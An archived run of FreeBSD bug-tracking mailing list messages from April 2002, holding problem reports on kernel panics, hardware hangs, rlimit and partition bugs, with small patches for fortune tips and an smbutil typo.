From owner-freebsd-bugs Sun Apr 14 5: 0:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7B0D137B41A for ; Sun, 14 Apr 2002 05:00:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EC02260858; Sun, 14 Apr 2002 05:00:02 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B8EA237B405 for ; Sun, 14 Apr 2002 04:51:10 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EBpAc59841; Sun, 14 Apr 2002 04:51:10 -0700 (PDT) (envelope-from nobody) Message-Id: <200204141151.g3EBpAc59841@freefall.freebsd.org> Date: Sun, 14 Apr 2002 04:51:10 -0700 (PDT) From: Patrick Dung To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/37056: usb mouse with bios legacy support on hangs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37056 >Category: kern >Synopsis: usb mouse with bios legacy support on hangs >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Apr 14 05:00:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Patrick Dung >Release: FreeBSD 4-Stable (kernel cvs date: 03-24-2002) >Organization: >Environment: can't boot into the machine to run "uname -a" >Description: I've a usb mouse. I set bios legacy support on. My PC is Gigabyte 6VXD7 (Dual PIII Via 694X chipset). Then I boot FreeBSD 4-stable smp kernel (self built). It hangs during the kernel is booting (at the very beginning), I captured some debug message: Fatal trap 12: page fault while in kernel mp_lock:00000002; cpuid = 0; lapic_id = 00000000 fault virtual address = 0x5048 fault code = supervisor mode, page not present instruction pointer = 0x8:0xc38a2cf stack pointer = 0x10:0xc0562fc8 frame pointer = 0x10:0xc0562fcc code segment = base 0x0, limit 0xfffff, type 0x16 = DPL 0, pres 1, def 32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = 0 (swapper) interrupt mask = none <- SMP:XXX kernel : type 12 trap, code = 0 stopped at: cpu_set_fork_handler:0x13: movl %edx,0x8(%eax) db> >How-To-Repeat: In BIOS, set USB on. Then set USB Keyboard and Mouse Legacy support On. Then boot freebsd 4 stable (smp kernel). >Fix: Set Legacy support off. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 5: 0:19 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A570937B41C for ; Sun, 14 Apr 2002 05:00:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EC02D60867; Sun, 14 Apr 2002 05:00:02 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E8EEC37B404 for ; Sun, 14 Apr 2002 04:54:12 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EBsCk60135; Sun, 14 Apr 2002 04:54:12 -0700 (PDT) (envelope-from nobody) Message-Id: <200204141154.g3EBsCk60135@freefall.freebsd.org> Date: Sun, 14 Apr 2002 04:54:12 -0700 (PDT) From: Christian Laursen To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/37057: Problem with rlimits on filesystem mounted from /dev/vn0c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37057 >Category: kern >Synopsis: Problem with rlimits on filesystem mounted from /dev/vn0c >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Apr 14 05:00:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Christian Laursen >Release: 4.5-STABLE >Organization: The Border Worlds >Environment: FreeBSD ferengi.borderworlds.dk 4.5-STABLE FreeBSD 4.5-STABLE #5: Sat Apr 13 23:25:44 CEST 2002 root@ferengi.borderworlds.dk:/usr/obj/usr/src/sys/FERENGI i386 >Description: When setting a soft limit on the filesize, any writes to a file seems to result in a SIGXFSZ being delivered, when the filesystem is mounted from a vn device. (This prevents postfix to work) >How-To-Repeat: This C program will trigger the bug: ==============8<==================== #include #include #include #include int main () { struct rlimit rlim; FILE *file; getrlimit (RLIMIT_FSIZE, &rlim); rlim.rlim_cur = 15; setrlimit (RLIMIT_FSIZE, &rlim); if ((file = fopen("testfile", "w")) == NULL) { perror("fopen"); exit(1); } fputs ("Some text", file); fclose (file); return 0; } ==============8<==================== Samle output: ferengi# cd /tmp/ ferengi# ./limit ferengi# cd /mnt/ ferengi# df . Filesystem 1K-blocks Used Avail Capacity Mounted on /dev/vn0c 4870 4 4478 0% /mnt ferengi# /tmp/limit Filesize limit exceeded >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 7:20:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 07CD737B416 for ; Sun, 14 Apr 2002 07:20:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EEK2601818; Sun, 14 Apr 2002 07:20:02 -0700 (PDT) (envelope-from gnats) Received: from krusty.e-technik.uni-dortmund.de (krusty.E-Technik.Uni-Dortmund.DE [129.217.163.1]) by hub.freebsd.org (Postfix) with ESMTP id 43E0737B405; Sun, 14 Apr 2002 07:12:22 -0700 (PDT) Received: from merlin.emma.line.org (localhost [127.0.0.1]) by krusty.e-technik.uni-dortmund.de (Postfix) with ESMTP id 9C104A3831; Sun, 14 Apr 2002 16:12:20 +0200 (CEST) Received: by merlin.emma.line.org (Postfix, from userid 500) id 2EAFE2C073; Sun, 14 Apr 2002 16:12:17 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by merlin.emma.line.org (Postfix) with ESMTP id CC5D3B763 for ; Sun, 14 Apr 2002 16:11:07 +0200 (CEST) Received: from pop3.web.de by localhost with POP3 (fetchmail-5.9.11) for emma@localhost (single-drop); Sun, 14 Apr 2002 16:11:07 +0200 (CEST) Received: from [217.81.248.165] (helo=merlin.emma.line.org) by mx05.web.de with esmtp (WEB.DE(Exim) 4.43 #48) id 16wkKk-0006k1-00 for matthias.andree@web.de; Sun, 14 Apr 2002 15:46:22 +0200 Received: (from emma@localhost) by merlin.emma.line.org (8.11.6/8.11.6) id g3EDk2G00380; Sun, 14 Apr 2002 15:46:02 +0200 (CEST) (envelope-from emma) Message-Id: <200204141346.g3EDk2G00380@merlin.emma.line.org> Date: Sun, 14 Apr 2002 15:46:02 +0200 (CEST) From: Matthias Andree Reply-To: Matthias Andree To: FreeBSD-gnats-submit@FreeBSD.org Cc: sos@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/37060: kernel panic with hw.ata.tags=1 in ata-disk.c:710 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37060 >Category: kern >Synopsis: kernel panic with hw.ata.tags=1 in ata-disk.c:710 >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Apr 14 07:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Matthias Andree >Release: FreeBSD 4.5-STABLE i386 >Organization: >Environment: System: FreeBSD emma1.emma.line.org 4.5-STABLE FreeBSD 4.5-STABLE #1: Sun Apr 14 13:33:10 CEST 2002 root@emma1.emma.line.org:/usr/src/sys/compile/MA i386 >Description: FreeBSD 4-STABLE, checked out around local midnight, 2002-04-14. When I use 'set hw.ata.tags=1' in the FreeBSD loader, the kernel panics (or jumps into the debugger). Leaving hw.ata.tags alone (not setting it) is fine, the machine boots up and works properly. This may be related to the "tagged acting up" recently reported on freebsd-stable@freebsd.org The last boot -v message is: "Creating DISK ad2" (copied with pen & paper): Fault trap 12: page fault while in kernel mode. Fault virtual address:0x1c fault code: supervisor read, page not present current process: 0 (swapper) irq mask: bio DDB: Stopped at: ad_service+0x30 testb $0x8,0x1c(%eax) (Looks as though %eax is NULL) trace: ad_service +0x30 ad_transfer +0x253 ata_start +0x98 adstrategy ar_rw ar_promise_read_conf ata_raiddisk_attach ad_attach ata_boot_attach The offending line is 710 (as per gdb "info *(ad_service+0x30)"): 705 /* do we have to check the other device on this channel ? */ 706 if (adp->device->channel->flags & ATA_QUEUED && change) { 707 int device = adp->device->unit; 708 709 if (adp->device->unit == ATA_MASTER) { 710 if (adp->device->channel->devices & ATA_ATA_SLAVE && 711 ((struct ad_softc *) 712 (adp->device->channel-> 713 device[ATA_DEV(ATA_SLAVE)].driver))->flags&AD_F_TAG_ENABLED) 714 device = ATA_SLAVE; 715 } ata-related dmesg: atapci0: port 0xffa0-0xffaf at device 7.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 atacontrol list: ATA channel 0: Master: ad0 ATA/ATAPI rev 6 Slave: no device present ATA channel 1: Master: ad2 ATA/ATAPI rev 5 Slave: ad3 ATA/ATAPI rev 4 (all do UDMA66 -- yes I know DTLA are unreliable, two out of seven died here) FWIW, probably unrelated: the machine is to boot from ad3, which was ad0 before I bought the Maxtor drive and added a Fujitsu UWSCSI drive. The machine also has a Promise PDC-20265R chip (onboard), but it's switched off (jumper or BIOS, I don't recall) and does not show up in dmesg. I'm willing to help further, I can use gdb and have a machine that I can attach via null modem cable, if need be. However, I'm not acquainted with FreeBSD's kernel debugger (ddb), so any instructions as to the ddb use should be verbose. Thanks in advance. >How-To-Repeat: on my system, pressing any key in the loader, then entering: set hw.ata.tags=1 boot will cause the problem. Adding a line "hw.ata.tags=1" to /boot/loader.conf also triggers the problem. >Fix: Workaround: comment out hw.ata.tags line in /boot/loader.conf. Comes at the expense of tagged queueing, obviously. Fix: will probably require changes to the ata driver that I cannot do. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 9:21: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 621CD37B404; Sun, 14 Apr 2002 09:21:05 -0700 (PDT) Received: (from phantom@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EGL5N25154; Sun, 14 Apr 2002 09:21:05 -0700 (PDT) (envelope-from phantom) Date: Sun, 14 Apr 2002 09:21:05 -0700 (PDT) From: Message-Id: <200204141621.g3EGL5N25154@freefall.freebsd.org> To: andy@openirc.co.uk, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/33956: uk.iso.kbd is missing some keymappings for euro symbol Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: uk.iso.kbd is missing some keymappings for euro symbol State-Changed-From-To: patched->closed State-Changed-By: phantom State-Changed-When: Sun Apr 14 09:19:37 PDT 2002 State-Changed-Why: MFCed in rev 1.13.2.2 of uk.iso.kbd http://www.freebsd.org/cgi/query-pr.cgi?pr=33956 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 9:50:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 02D2F37B416 for ; Sun, 14 Apr 2002 09:50:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EGo1v29473; Sun, 14 Apr 2002 09:50:01 -0700 (PDT) (envelope-from gnats) Received: from mars.wanadoo.fr (ca-ol-sqy-22-253.abo.wanadoo.fr [80.8.59.253]) by hub.freebsd.org (Postfix) with ESMTP id 1136737B400 for ; Sun, 14 Apr 2002 09:47:29 -0700 (PDT) Received: from mars.wanadoo.fr (mars [127.0.0.1]) by mars.wanadoo.fr (8.12.2/8.11.6) with ESMTP id g3EGkls6001422 for ; Sun, 14 Apr 2002 18:46:47 +0200 (CEST) (envelope-from dak@mars.wanadoo.fr) Received: (from dak@localhost) by mars.wanadoo.fr (8.12.2/8.12.2/Submit) id g3EGklxW001421; Sun, 14 Apr 2002 18:46:47 +0200 (CEST) Message-Id: <200204141646.g3EGklxW001421@mars.wanadoo.fr> Date: Sun, 14 Apr 2002 18:46:47 +0200 (CEST) From: dak Reply-To: "aurelien.nephtali@wanadoo.fr" To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/37064: System hangs when removing wire of NIC D-Link DFE-650 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37064 >Category: kern >Synopsis: System hangs when removing wire of NIC D-Link DFE-650 >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Apr 14 09:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: dak >Release: FreeBSD 4.5-STABLE i386 >Organization: none >Environment: System: FreeBSD mars 4.5-STABLE FreeBSD 4.5-STABLE #49: Mon Apr 8 22:02:01 CEST 2002 dak@mars:/usr/src/sys/compile/laptop i386 Laptop: Compaq Presario serie 1200 Model 12XL408 NIC: D-Link DFE-650 10/100 Network: 10Mb (but it does the same when used in 100Mb) >Description: When removing wire directly from the card or removing the RJ45 wire, in a word when there isn't any network signal in the NIC (when all LEDs of the NIC are off) the system hangs. When the card is ejected directly after the hang, the system 'un-hang' but if we wait too much, removing or not the card doesn't change anything. This problem doesn't seem to be serious but ejecting the card just to do some physical network config is very annoying :< >How-To-Repeat: Just remove wire as I said. >Fix: Don't know :< >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 9:50:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B799537B404 for ; Sun, 14 Apr 2002 09:50:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EGo1329464; Sun, 14 Apr 2002 09:50:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3384137B404 for ; Sun, 14 Apr 2002 09:46:53 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EGkr629165; Sun, 14 Apr 2002 09:46:53 -0700 (PDT) (envelope-from nobody) Message-Id: <200204141646.g3EGkr629165@freefall.freebsd.org> Date: Sun, 14 Apr 2002 09:46:53 -0700 (PDT) From: Aggelos Oikonomopoulos To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/37063: [PATCH] kernel does not support extended linux partitions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37063 >Category: kern >Synopsis: [PATCH] kernel does not support extended linux partitions >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Apr 14 09:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Aggelos Oikonomopoulos >Release: FreeBSD -stable >Organization: >Environment: FreeBSD erwin.gr 4.5-STABLE FreeBSD 4.5-STABLE #0: Thu Mar 7 17:33:51 EET 2002 root@erwin.gr:/usr/obj/usr/src/sys/CUSTOM i386 >Description: The kernel does not handle partitions of type 0x85 (extended linux). An extended linux partition is the same as an extended DOS partition, except for the entry in the partition table. Looking at the code, -current does not provide this functionality either. >How-To-Repeat: Create an extended partition of type 0x85 and at least one logical partition in it. Try to access the device corresponding to such a logical partition. >Fix: A three-liner to add the functionality can be found at http://www.cc.ece.ntua.gr/~aoiko/lin-extp.patch >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 9:59:34 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from rwcrmhc54.attbi.com (rwcrmhc54.attbi.com [216.148.227.87]) by hub.freebsd.org (Postfix) with ESMTP id B7B4337B404; Sun, 14 Apr 2002 09:59:30 -0700 (PDT) Received: from photoniii ([66.31.5.199]) by rwcrmhc54.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP id <20020414165925.WXMA15826.rwcrmhc54.attbi.com@photoniii>; Sun, 14 Apr 2002 16:59:25 +0000 Date: Sun, 14 Apr 2002 13:07:13 -0400 From: Tadayuki OKADA To: joe@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/34205: detect USB memory device, But can not use Message-Id: <20020414130713.223997d3.tadayuki@attbi.com> In-Reply-To: <200201261147.g0QBlpU88537@freefall.freebsd.org> References: <200201261147.g0QBlpU88537@freefall.freebsd.org> X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, Could you commit PR 34205? I did same thing and it worked fine. On Sat, 26 Jan 2002 03:47:51 -0800 (PST) wrote: > Synopsis: detect USB memory device, But can not use > > Responsible-Changed-From-To: freebsd-bugs->joe > Responsible-Changed-By: joe > Responsible-Changed-When: Sat Jan 26 03:47:44 PST 2002 > Responsible-Changed-Why: > I'll take this one. > > http://www.FreeBSD.org/cgi/query-pr.cgi?pr=34205 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-bugs" in the body of the message Regards, -- Tadayuki OKADA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 10: 0: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C63B637B405; Sun, 14 Apr 2002 10:00:03 -0700 (PDT) Received: (from phantom@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EH03030840; Sun, 14 Apr 2002 10:00:03 -0700 (PDT) (envelope-from phantom) Date: Sun, 14 Apr 2002 10:00:03 -0700 (PDT) From: Message-Id: <200204141700.g3EH03030840@freefall.freebsd.org> To: B.Anastasatos@Freemail.gr, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/32233: Fix /usr/src/sbin/mount_msdosfs/iso72dos bugs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Fix /usr/src/sbin/mount_msdosfs/iso72dos bugs State-Changed-From-To: analyzed->closed State-Changed-By: phantom State-Changed-When: Sun Apr 14 09:59:40 PDT 2002 State-Changed-Why: MFCed. Thanks! http://www.freebsd.org/cgi/query-pr.cgi?pr=32233 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 13:50:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5628137B416 for ; Sun, 14 Apr 2002 13:50:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EKo2f98221; Sun, 14 Apr 2002 13:50:02 -0700 (PDT) (envelope-from gnats) Received: from mail.tgd.net (mail.tgd.net [209.81.25.10]) by hub.freebsd.org (Postfix) with ESMTP id 45DBF37B400 for ; Sun, 14 Apr 2002 13:43:54 -0700 (PDT) Received: by mail.tgd.net (Postfix, from userid 1001) id D8B6620F0A; Sun, 14 Apr 2002 13:43:53 -0700 (PDT) Message-Id: <20020414204353.D8B6620F0A@mail.tgd.net> Date: Sun, 14 Apr 2002 13:43:53 -0700 (PDT) From: Sean Chittenden Reply-To: Sean Chittenden To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: misc/37073: Few new tips for FreeBSD-tips fortune Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37073 >Category: misc >Synopsis: Few new tips for FreeBSD-tips fortune >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Apr 14 13:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Sean Chittenden >Release: FreeBSD 4.5-STABLE i386 >Organization: >Environment: System: FreeBSD ninja1.internal 4.5-STABLE FreeBSD 4.5-STABLE #0: Fri Apr 5 18:08:12 PST 2002 root@ninja1.internal:/opt/obj/opt/src/sys/NINJA i386 >Description: Attached patch addes a few tips for the portupgrade suite of utilities and makes a few spelling corrections/english-izations. >How-To-Repeat: >Fix: Index: games/fortune/datfiles/freebsd-tips =================================================================== RCS file: /home/ncvs/src/games/fortune/datfiles/freebsd-tips,v retrieving revision 1.14.2.4 diff -u -r1.14.2.4 freebsd-tips --- games/fortune/datfiles/freebsd-tips 2002/03/24 03:28:46 1.14.2.4 +++ games/fortune/datfiles/freebsd-tips 2002/04/14 20:35:30 @@ -7,7 +7,7 @@ By pressing "Scroll Lock" you can use the arrow keys to scroll backward through the console output. Press "Scroll Lock" again to turn it off. % -Want colour in your directory listings? Use "ls -G". "ls -F" is also useful, +Want color in your directory listings? Use "ls -G". "ls -F" is also useful, and they can be combined as "ls -FG". % If you need to ask a question on the FreeBSD-questions mailing list then @@ -128,12 +128,12 @@ learned it, but somewhat user-unfriendly. To use ee (an easier but less powerful editor) instead, set the environment variable EDITOR to /usr/bin/ee % -If you accidently end up inside vi, you can quit it by pressing Escape, colon +If you accidentally end up inside vi, you can quit it by pressing Escape, colon (:), q (q), bang (!) and pressing return. % You can use aliases to decrease the amount of typing you need to do to get commands you commonly use. Examples of fairly popular aliases include (in -bourne shell style, as in /bin/sh, bash, ksh, and zsh): +Bourne shell style, as in /bin/sh, bash, ksh, and zsh): alias lf="ls -FA" alias ll="ls -lA" @@ -148,8 +148,8 @@ To remove an alias, you can usually use 'unalias aliasname'. To list all aliases, you can usually type just 'alias'. % -In order to support national characters for european languages in tools like -less without creating other nationalisation aspects, set the environment +In order to support national characters for European languages in tools like +less without creating other nationalization aspects, set the environment variable LC_ALL to 'en_US.ISO8859-1'. % You can search for documentation on a keyword by typing @@ -460,7 +460,7 @@ You can open up a new split-screen window in (n)vi with :N or :E and then use ^w to switch between the two. % -sh (the default bourne shell in FreeBSD) supports command-line editing. Just +sh (the default Bourne shell in FreeBSD) supports command-line editing. Just ``set -o emacs'' or ``set -o vi'' to enable it. % When you've made modifications to a file in vi(1) and then find that @@ -469,3 +469,46 @@ This won't work if you don't have write permissions to the directory and probably won't be suitable if you're editing through a symbolic link. +% +The portupgrade package contains several useful programs that help +with upgrading, installing, and comparing versions of software that +has been installed via ports. + + # cd /usr/ports/sysutils/portupgrade/ + # make install && make clean +% +If you are updating your ports tree and have the portupgrade(1) +utilities installed, run the following command to see what ports can +be upgraded: + + # portversion -v -L= +% +The portupgrade(1) utility (ports/sysutils/portupgrade) provides a +safe and easy way for upgrading ports. + + # portupgrade [portname] +% +The portsdb(1) command that comes with the portupgrade(1) suite of +utilities (ports/sysutils/portupgrade) can be used to remake the ports +master INDEX file. Try adding the following line to your +/etc/weekly.local file so that periodic(8) will rebuild the ports +INDEX: + +/usr/bin/nice -20 /usr/local/sbin/portsdb -U -u +% +The pkgdb(1) command that comes with the portupgrade(1) suite of +utilities (ports/sysutils/portupgrade) can be used to correct broken +dependencies that can sometimes occur when upgrading ports with +dependencies. After upgrading several ports, it is probably a good +idea to run the following command to fix port dependencies. + + # pkgdb -F +% +Try combining portversion(1) with tee(1) and a periodic(8) job that +follows after you update your ports tree. Use tee(1) that way you get +a list of ports that can be upgraded in your nightly email along with +an updated copy on the file system. portversion(1) is apart of the +portupgrade port (ports/sysutils/portupgrade). Ex: place the +following after cvsup commands in /etc/weekly.local: + +/usr/local/sbin/portversion -O -v -L= | /usr/bin/tee /etc/upgradable_ports >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 14: 0:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7A34937B405 for ; Sun, 14 Apr 2002 14:00:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EL02R99428; Sun, 14 Apr 2002 14:00:02 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 30CE937B400 for ; Sun, 14 Apr 2002 13:55:15 -0700 (PDT) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EKtF598786; Sun, 14 Apr 2002 13:55:15 -0700 (PDT) (envelope-from nobody) Message-Id: <200204142055.g3EKtF598786@freefall.freebsd.org> Date: Sun, 14 Apr 2002 13:55:15 -0700 (PDT) From: Andre Guibert de Bruet To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/37074: [PATCH] Typographical error in output of "smbutil view" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37074 >Category: bin >Synopsis: [PATCH] Typographical error in output of "smbutil view" >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Apr 14 14:00:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Andre Guibert de Bruet >Release: 4.5-STABLE >Organization: Silicon Landmark >Environment: FreeBSD alpha.siliconlandmark.com 4.5-STABLE FreeBSD 4.5-STABLE #0: Sun Mar 17 20:01:54 EST 2002 root@alpha.siliconlandmark.com:/usr/src/sys/compile/ALPHA i386 >Description: smbutil, built from /usr/src/contrib/smbfs/smbutil contains a typographical error when outputing the usage of the view parameter. $ smbutil view usage: smbutil view [connection optinons] //[user@]server >How-To-Repeat: Run "smbutil view". Verified the problem on a freshly cvsup'ed and rebuilt machine (As of 04/14/2002). >Fix: Patch available at: http://siliconlandmark.com/staff/andre/smbutil.view.patch >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Apr 14 15:20:20 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6111137B41B for ; Sun, 14 Apr 2002 15:20:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3EMK1j16369; Sun, 14 Apr 2002 15:20:01 -0700 (PDT) (envelope-from gnats) Received: from mailout08.sul.t-online.com (mailout08.sul.t-online.com [194.25.134.20]) by hub.freebsd.org (Postfix) with ESMTP id D385D37B400 for ; Sun, 14 Apr 2002 15:19:29 -0700 (PDT) Received: from fwd01.sul.t-online.de by mailout08.sul.t-online.com with smtp id 16wsLI-00060m-03; Mon, 15 Apr 2002 